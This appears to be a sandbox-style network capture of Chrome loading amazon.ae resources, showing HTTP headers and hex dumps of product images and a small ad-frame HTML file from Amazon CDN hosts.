                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC23INData Raw: 77 69 6e 64 6f 77 2e 75 65 5f 61 64 62 5f 63 68 6b 20 3d 20 31 3b 0a
                                                                                                                                                                                                                                                                      Data Ascii: window.ue_adb_chk = 1;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      49192.168.2.549779151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC611OUTGET /images/I/41qWHXXnEKL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 6523
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 41a25900-5a7c-4aeb-992a-531fa8a6db2d
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 04 Mar 2024 16:57:33 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 08:08:41 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 210002
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000044-IAD, cache-ewr-kewr1740063-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 07 08 01 05 06 04 02 03 09 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 02 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 3c f9 ca 6c b0 84 e5 66 a3 7a a5 24 a1 7e d6 89 f9 7b 58 e5 02 4b 96 3e 7f f6 00 88 cc fe f6 03 cd 5a aa 48 7c 7f 28 2a 94 4f 31 b4 89 72 a9 c7 f1 a9 97 2d 7e cf 0c 9c 4a db 63 c5 a7 b7 13 5a 95 98 f2 68 da df ef 84 ff 00 c2 79 3f 20 c9 60 9b 57 85 ea f2 e3 76 ea b9 7d c6 c9 ef bc fe 6d 21 ed a4 c2 cc 08 ad f9 ce 5c fe 05 23 c1 d4 af bc 35 b0 65 de cb f1 56 fa d0 ee f0 c9 37 2f db 1c b0 0f 1d 2b 3c 5f fa 32 9f 39 6d d8 af 19 39 22 37 ff 00 cc 44 1e 4f 15 44 1d 2b 75 7d 52 cf 57 6e 2b b5 fa cd da 54 cb 05 de 3e fc d3 13 48 14 19 85 17 35 aa d5 b6 b1 87 ad 51 a6 ac 5a 9e b7 02 5b 67 7f ce 86 46 bb 37 4c 77 5e 1b ef 2f f0 b9 fb 20 3a 16 b5 da 12 dd da 7e ac a7 c2 ed d5 7b 22 46 97 18 fd c4 9f de 36 c8 cb ef 1d fd fa e3 97 c8 79 39 dc 7e 11 b5 46 5d d5 6a f1
                                                                                                                                                                                                                                                                      Data Ascii: <lfz$~{XK>ZH|(*O1r-~JcZhy? `Wv}m!\#5eV7/+<_29m9"7DOD+u}RWn+T>H5QZ[gF7Lw^/ :~{"F6y9~F]j
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 4e 46 43 2d 1f 17 cf 4c 9a 25 32 6c 22 77 a6 4b 1b 44 4d c5 07 b2 69 8b ad 0a 8e 7f fa b7 85 03 38 f9 62 83 4e bc 2a 0b 3e cb 6f 0d 6e ce 01 77 99 02 6d d5 2a 51 72 9c 2b 91 c8 79 27 b9 17 84 d1 15 b0 0c 37 2f cc 60 47 cc 15 00 91 c2 2a 2c 4e 3d 42 67 81 54 32 7a 56 de 1a de eb 39 af b6 60 a4 c2 6b 81 d2 77 18 e2 8e 75 94 fb f2 54 99 fd 53 20 01 42 62 e4 5e dd b4 6e 53 a6 9c 6a 3e e8 3b 79 98 a9 b9 a9 8b 63 9d 9b d4 5b 67 08 a8 96 be 73 c9 e2 67 d1 ca 8c fc 35 ac 16 86 8b dd 44 ca e8 1b a2 ab 5e 76 55 f0 37 a6 af f9 e8 83 ed 13 e4 69 cf 80 33 94 1f 68 9d 4e 2a 57 28 d5 ec bf 35 8e 6e a4 28 78 d9 c7 dc 2a 54 43 4a b6 b0 3a dd 8c 32 32 c9 e0 86 69 1c 56 89 e4 88 3b b2 39 ad e1 e9 8d 23 52 64 85 26 1b df 1b d7 da 53 4e b0 c2 f5 a1 28 29 80 28 39 af 1b 15 da
                                                                                                                                                                                                                                                                      Data Ascii: NFC-L%2l"wKDMi8bN*>onwm*Qr+y'7/`G*,N=BgT2zV9`kwuTS Bb^nSj>;yc[gsg5D^vU7i3hN*W(5n(x*TCJ:22iV;9#Rd&SN()(9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 84 68 07 20 40 83 1e 3a 94 f1 a6 2e de 42 10 08 71 87 db 77 54 b0 65 81 c5 94 a2 03 c2 7d 95 8d d1 01 22 8e b3 81 ce 85 34 01 b2 c0 2e 0e e2 da 21 97 fc 8c 9f 4a 20 9d 61 b6 68 08 67 dc b3 b3 3d be 51 0c 44 f0 04 2a c0 b2 03 22 10 5c 02 96 54 2a d6 d0 67 21 c2 26 20 64 16 c0 a1 a5 b1 a0 e4 81 aa 78 a0 ea 3e 8b 5c 2b 40 5a f7 aa 31 99 95 01 8e 59 6b 1d 70 ee 0c 50 19 76 00 fd e9 5a 88 d9 d9 21 c9 e2 ac 9a 3a 61 d4 2d 67 e5 ce 21 32 5c 50 74 1e 1c f4 1b 22 60 84 9c 66 a7 83 08 c4 28 9a 63 d0 3e 7f 29 58 fb 62 72 48 49 d5 1a b0 ee a8 bc ce bb ad 7e 11 f5 17 a2 08 cd 0b 34 00 2e 5c 2a b0 df 32 52 b6 b9 51 76 96 a5 d1 00 96 99 84 e2 63 b9 dc 27 5a c5 29 77 53 44 eb b8 87 64 d1 76 6a 60 74 44 cd 7c 23 d1 ae 9f ce a0 dc 26 cd 62 07 4a 71 4c 86 89 a5 4f 77 e5 c3
                                                                                                                                                                                                                                                                      Data Ascii: h @:.BqwTe}"4.!J ahg=QD*"\T*g!& dx>\+@Z1YkpPvZ!:a-g!2\Pt"`f(c>)XbrHI~4.\*2RQvc'Z)wSDdvj`tD|#&bJqLOw
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1011INData Raw: 2d ed bc 7c 07 ec 46 9a 7d 85 0c 0c 68 a5 e4 48 5f 21 4a 3f 71 30 4f 30 f8 19 63 79 b4 d3 ca 16 c3 98 f1 fb ae 49 9c 23 1e 20 be 81 f6 47 2a b9 1e 1b 56 e0 77 fc c2 0d 79 ad a7 18 e0 d7 15 26 d1 78 0d a5 3c 04 02 3e 97 94 d7 0c b8 df 53 f4 fb fc d6 ae ef 5b 49 bd f8 d4 85 e4 6c a0 82 9c 18 ba 78 aa 12 81 db 3c 9b 28 6c c2 cf 2a 23 90 b0 78 1a 47 e1 7a 5f c6 62 6a 6d 77 08 ce b1 0b ab 0b 63 13 b7 ca 2f 78 1f b2 aa 6b da 84 6b dc 52 27 c0 6b e0 c8 56 85 1a 10 ea 36 36 62 26 4f 73 c0 93 b9 a3 df 21 a9 3f af af 76 00 fb a3 7f 66 0f 20 b4 cb 01 6c 6f e1 6a 79 56 79 33 3c 45 76 ea f4 8d c0 89 5e 24 fd 67 e5 b6 f5 75 91 4d fd 8a 2d ad 8b b1 a0 62 c6 e9 dd d9 78 88 c5 95 c2 54 e6 99 c8 57 0c 7c fa 48 29 d8 2a 0c b2 f6 5f dc 37 c2 40 f8 ce 0d 33 69 47 2d 4a 06 20
                                                                                                                                                                                                                                                                      Data Ascii: -|F}hH_!J?q0O0cyI# G*Vwy&x<>S[Ilx<(l*#xGz_bjmwc/xkkR'kV66b&Os!?vf lojyVy3<Ev^$guM-bxTW|H)*_7@3iG-J


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      50192.168.2.549780151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC611OUTGET /images/I/3153Pv75-uS._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 3486
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 3a3021d5-965f-43a7-9223-2bfafe67e672
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 09 Jun 2021 08:41:06 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sat, 30 Jul 2044 08:39:01 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 628107
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100100-IAD, cache-ewr-kewr1740020-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 08 03 04 05 06 07 02 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 01 02 03 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 84 34 f7 04 3a 81 dd 4d 87 66 8f 0d 7f 45 54 c7 f8 71 09 fd 8a b4 b1 be aa f1 f1 2d fa ef 91 d5 e2 01 bd f1 ef ae d9 83 a7 89 15 66 4f 49 9d 4b 84 09 23 c2 a5 1f 05 54 db c9 53 d7 e7 0f a8 d1 48 6e dd d5 5b e0 eb 4a 78 d7 29 3c 29 e0 67 45 44 5d 1e 18 3e 9a b7 2d fb c2 c9 c6 d9 0f 50 99 75 09 96 fe 55 bf 95 6f e5 5b f9 56 f6 44 53 11 f9 fd ff 00 ff c4 00 25 11 00 01 04 02 00 05 05 01 00 00 00 00 00 00 00 00 02 00 01 03 04 05 11 06 12 14 20 32 07 13 21 31 50 15 ff da 00 08 01 03 01 01 08 00 fd fc 25 28 25 ac 6f 2c 98 0a 13 0f 21 de f4 d7 9d 9c f1 f7 2b 64 68 4c f0 db eb e7 4f 90 b0 9f 21 65 7f 46 ca c6 5b 96 49 4d a4 ee e1 ba 83 2d 09 51 c4 40 fa 7e 67 56 b1 b5 af 44 f0 5a b1 e9 70 36 ca bc dc 26 51 ed 8a 5c 03 8f 83 e2 e7 65 8c 84 c2 63 63 ee c1 64 de 00
                                                                                                                                                                                                                                                                      Data Ascii: 4:MfETq-fOIK#TSHn[Jx)<)gED]>-PuUo[VDS% 2!1P%(%o,!+dhLO!eF[IM-Q@~gVDZp6&Q\eccd
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC730INData Raw: f1 1f ec 05 29 bd ef 0b a4 21 d9 b2 c2 55 4e 0c 5f 3c 12 d8 f7 b9 4e 5c 9e b1 da 0d 29 03 9f 68 3c 41 ed 16 e0 ca b3 41 ec fa 84 d0 d4 fa fc 14 87 02 22 10 2b b2 96 26 57 b3 0b 38 b5 9c 3a 11 1f f4 2c 71 de 64 9c ca 07 93 0f 8f 99 c6 2b 1e 9c 84 42 b8 83 c8 af 51 0d 09 b1 b5 f3 14 20 2e 22 39 90 71 f7 21 59 1b f8 03 5f 36 32 20 41 08 06 17 d8 6a d9 8c 55 3c 19 e9 a8 c4 83 52 b3 ec fa 20 b8 29 9e 4b a0 c9 f9 98 6b 34 fe ad a0 db b5 e2 ab f1 17 59 b8 97 3a 18 0e fd 9f 58 f7 fb 57 76 45 c5 38 b8 4e e1 d2 03 87 7c ec 05 a3 f5 86 01 63 33 a8 46 30 46 54 db f5 04 a5 89 f0 98 24 0d 81 d6 ef f7 e1 11 b9 ff 00 56 6b ec b3 b6 54 0e c6 0b af 03 fc 1d a5 9e b5 c3 5e 85 4e a1 12 64 dc 12 a3 c9 20 6f 94 36 e3 78 d7 19 bf 29 32 e1 e3 67 a9 18 17 b8 72 c1 d6 92 e3 6d 8c
                                                                                                                                                                                                                                                                      Data Ascii: )!UN_<N\)h<AA"+&W8:,qd+BQ ."9q!Y_62 AjU<R )Kk4Y:XWvE8N|c3F0FT$VkT^Nd o6x)2grm


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      51192.168.2.54977218.239.24.1884432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC749OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.html HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                      Content-Length: 167
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: fb09f017-a5f9-4619-aaa9-fa803a87c0fb
                                                                                                                                                                                                                                                                      Date: Sat, 17 Aug 2024 01:11:31 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sat, 17 Aug 2024 01:10:58 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-600,/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821
                                                                                                                                                                                                                                                                      Expires: Thu, 13 Feb 2025 01:11:31 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-600 /images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 be95b2ba3a5805485c26e84ad1dd7a2e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 407817
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: CZGtHRMmh1CaVvJeS2UX_dAN-vEOlygPnLgiZAsakxJRnFnqmSOcdw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC167INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 66 2d 31 2e 35 30 2e 61 66 32 35 32 37 38 62 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.af25278b.js" ></script></body></html>


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      52192.168.2.54977818.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC375OUTGET /images/I/61cg-CaC1GL._SX1500_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC830INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 83172
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 22c55265-8350-4b09-8112-793239d8dba6
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 19:01:03 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 15 Aug 2024 06:35:42 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-240,/images/I/61cg-CaC1GL
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 19:01:03 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-240 /images/I/61cg-CaC1GL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 a44309111e5e1050ff485adaa4681ad0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: OQo6NfH4X-fjQ7GfNu3uMB995sFRRMmb9SIt8l4y6gTgfvngQW8zew==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff eb 34 47 4a 50 02 11 00 00 00 01 00 00 34 3d 6a 75 6d 62 00 00 00 1e 6a 75 6d 64 63 32 70 61 00 11 00 10 80 00 00 aa 00 38 9b 71 03 63 32 70 61 00 00 00 34 17 6a 75 6d 62 00 00 00 47 6a 75 6d 64 63 32 6d 61 00 11 00 10 80 00 00 aa 00 38 9b 71 03 75 72 6e 3a 75 75 69 64 3a 39 37 39 65 31 63 30 62 2d 62 63 61 63 2d 34 38 31 38 2d 61 63 34 36 2d 32 38 38 35 39 35 34 32 61 36 33 31 00 00 00 01 b4 6a 75 6d 62 00 00 00 29 6a 75 6d 64 63 32 61 73 00 11 00 10 80 00 00 aa 00 38 9b 71 03 63 32 70 61 2e 61 73 73 65 72 74 69 6f 6e 73 00 00 00 00 d7 6a 75 6d 62 00 00 00 26 6a 75 6d 64 63 62 6f 72 00 11 00 10 80 00 00 aa 00 38 9b
                                                                                                                                                                                                                                                                      Data Ascii: JFIFExifII*4GJP4=jumbjumdc2pa8qc2pa4jumbGjumdc2ma8qurn:uuid:979e1c0b-bcac-4818-ac46-28859542a631jumb)jumdc2as8qc2pa.assertionsjumb&jumdcbor8
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1514INData Raw: b7 45 cb 13 14 92 4b 18 89 09 b4 d5 e1 d8 c3 8b a5 96 b3 75 39 76 17 a3 e3 7b fc 1e 8f b9 d1 ec c2 d8 ac 72 63 96 39 63 7e da 1a 9f 11 9f be f3 1e 7f ea 3e 0f d5 6d 3e 6d b7 da ef 43 e5 fa 2a 00 12 5a 04 50 00 00 00 8a a5 52 da b6 f9 3f 2d c5 f5 2f 71 ad ef 71 fc 93 ce 7d 4f d9 f9 8f ad e5 c3 d7 ea f5 3a 9a cf 2b bb f5 5f 3c f5 7d 1d 67 12 63 71 62 84 89 66 2a d9 ea 71 ec 6b bc 77 2e eb 9f 63 d4 f4 1d 9e a7 97 f2 9e ab 65 7b dd 1c f9 80 2c 03 75 f5 40 d1 79 1f 4d e9 3e 6d dd f4 be 6b d3 ed be 72 f6 5b 40 f0 de 32 46 4c 6c ca 4c 80 c7 2c 72 06 39 31 c8 49 96 39 01 8e 40 02 95 4b 6d 65 e5 3c a6 3e d3 e8 fd 4e 6e 87 c4 b6 5e e3 d7 eb be bb ac eb f0 70 74 fa fa ff 00 31 de f4 9f 31 dd ef 3b 9a de 0c 62 49 04 41 23 2e c6 b5 87 91 d5 67 b9 da f5 b9 3d 67 6f a1
                                                                                                                                                                                                                                                                      Data Ascii: EKu9v{rc9c~>m>mC*ZPR?-/qq}O:+_<}gcqbf*qkw.ce{,u@yM>mkr[@2FLlL,r91I9@Kme<>Nn^pt11;bIA#.g=go
